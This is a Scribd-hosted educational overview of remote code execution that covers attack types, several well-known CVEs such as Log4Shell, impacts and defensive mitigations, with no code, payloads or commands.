Scribd
Upload
50 views5 pages

Remote Code Execution

Uploaded by

Priyanka Waghmare
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
50 views5 pages

Remote Code Execution

Uploaded by

Priyanka Waghmare
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

REMOTE CODE EXECUTION

Remote code execution is a cyber-attack whereby an attacker can remotely


execute commands on someone else’s computing device. Remote code executions
(RCEs) usually occur due to malicious malware downloaded by the host and can
happen regardless of the device’s geographic location. Remote Code Execution
(RCE) is also referred to as Remote Code Evaluation.

How an RCE Attack Works


Because remote code execution is such a broad term, there’s no single way you
can expect an RCE attack to act. In general, RCE attacks have three phases:
1. Hackers identify a vulnerability in a network’s hardware or software
2. In exploiting this vulnerability, they remotely place malicious code or malware
on a device
3. Once the hackers have access to your network, they compromise user data or
use your network for nefarious purposes.

Types of RCE Attacks


There are several types of RCE attacks. The most common are:
1. Injection attack—various applications allow user-supplied input to execute
commands. Attackers can provide deliberately malformed input data to execute
arbitrary code.
2. Deserialization attack—applications often use serialization to organize data for
easier communication. Deserialization programs can interpret user-supplied
serialized data as executable code.
3. Out-of-bounds write—applications often allocate fixed memory chunks to store
data. Memory allocation flaws allow attackers to supply inputs that write outside
the buffer—the memory stores executable code, including malicious code.

Remote Code Execution Exploit Techniques

There are two primary methods for performing RCE: remote code evaluation and
stored code evaluation.

Remote Code Evaluation


Code evaluation occurs when functions that evaluate code accept user input. For
example, some applications allow users to generate variable names using their
usernames—the users control their usernames, so they can create a username
including malicious code, and influence applications that enable input evaluation
for a certain programming language.

Stored Code Evaluation


This method differs from standard remote code evaluation because it relies on the
interpreter parsing files rather than specific language functions. The interpreter
should not execute files with user input. Web applications often have an upload
functionality but do not sufficiently validate the files. For example, an application
might have a control panel for each user with specific language variable settings,
which it stores in a config file. Attackers can modify the language parameter to
inject code into the configuration file, allowing them to execute arbitrary
commands.

Examples of Known Remote Code Execution Vulnerabilities


Here are some of the most significant RCE vulnerabilities discovered in recent
years:
• CVE-2021-44228 (Log4Shell)—a vulnerability in Apache Log4j 2.x, which was
followed by additional Log4j vulnerabilities CVE-2021-45046 and a CVE-
2021-45105. It affects multiple versions of Log4j, a common logging library
used by millions of Java applications, including some of the world’s biggest
online services. It allows attackers to execute code remotely even if they are
not authenticated, by creating a malicious LDAP server and accessing it via
the Log4j JndiLookup class.
• CVE-2021-1844—a vulnerability in operating system modules of Apple iOS,
macOS, watchOS, and Safari. When a victim uses a vulnerable device to
access an attacker-controlled URL, the operating system executes a
malicious payload on that device.
• CVE-2020-17051—a vulnerability affecting a Microsoft Windows
communication protocol, NFS v3. An attacker can use it to connect to a
vulnerable NFS server and send a payload to run on the target endpoint.
• CVE-2019-8942—a vulnerability in WordPress 5.0.0, allowing attackers to
execute arbitrary code in WordPress by uploading a specially crafted image
file that includes PHP code in its Exif metadata.

Impact

RCE vulnerabilities can have severe impacts on a system or application, including:


• Penetration—attackers can use RCE vulnerabilities as their first entry into a
network or environment.
• Privilege escalation—in many cases, servers have internal vulnerabilities which
can only be seen by those with inside access. RCE allows an attacker to discover
and exploit these vulnerabilities, escalating privileges and gaining access to
connected systems.
• Sensitive data exposure—RCE can be used to exfiltrate data from vulnerable
systems by installing data-stealing malware or directly executing commands. This
can range from simple copying of unencrypted data to memory-scraping malware
that looks for credentials in system memory.
• Denial of Service (DoS)—an RCE vulnerability allows attackers to execute code
on a system. This code can be used to exhaust system resources and crash the
system, or to leverage the system’s resources to conduct DoS against third parties.

• Cryptomining—a common next step after exploiting RCE is to run cryptomining


or cryptojacking malware that uses the computing resources of an infected device
to mine cryptocurrencies, to the financial benefit of the attacker.
• Ransomware—possibly the most dangerous consequence of RCE is that attackers
can deploy ransomware on the affected application or server, and spread
ransomware through the network, denying users access to their files until they pay
a ransom.

MITIGATIONS

There are many ways to perform RCE, so protecting against them requires a multi-
layered cybersecurity approach:
➢ Patch management: The best way to protect a system or network from an RCE
attack is to fix the vulnerabilities that let an attacker gain access. Microsoft releases
security patches addressing remote code execution vulnerabilities in its monthly
Patch Tuesday fixes.
➢ Sanitize user input: Deserialization attacks and injection attacks take advantage
of contaminated user inputs. Input sanitization involves validating and filtering data
inputs from users, application program interfaces and web services. Escape
sanitization is a security tool used to scrub invalid data requests so that they are
not interpreted as code.
➢ Inspect incoming traffic: Using intrusion detection systems, packet sniffers and
web application firewalls are some ways to vet incoming traffic for suspicious
behavior and keep attackers out.
➢ Buffer overflow protection: When buffer overflow protection software detects
a buffer overflow, it terminates the affected program to prevent attackers from
damaging it.
➢ Runtime application self-protection This technology analyzes an application's
behavior and the context of that behavior for abnormalities. It can be used to help
sanitize and vet user inputs.
➢ Control access Network security policies like zero-trust, network segmentation
and access management can minimize the impact of a network breach and keep
attackers from escalating privileges.

REFERENCES
• https://www.bugcrowd.com/glossary/remote-code-execution-rce/
• https://www.imperva.com/learn/application-security/remote-code-
execution/
• https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-
rce/

You might also like